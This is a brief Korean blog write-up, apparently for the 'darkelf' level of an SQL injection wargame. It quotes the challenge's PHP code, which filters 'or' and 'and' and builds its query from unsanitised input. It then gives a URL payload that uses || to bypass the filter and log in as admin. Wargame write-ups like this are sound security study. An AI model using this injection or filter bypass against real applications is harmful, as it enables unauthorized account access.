언우s 2018. 4. 11. 09:31

6. darkelf


if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 

or, and 필터링
$query = "select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'"; 

id=guest
if($result['id'] == 'admin') solve("darkelf"); 

id=admin 이어야 클리어

or, and ||, &&로 우회 가능

?pw=%27%20||%20id=%27admin%27%23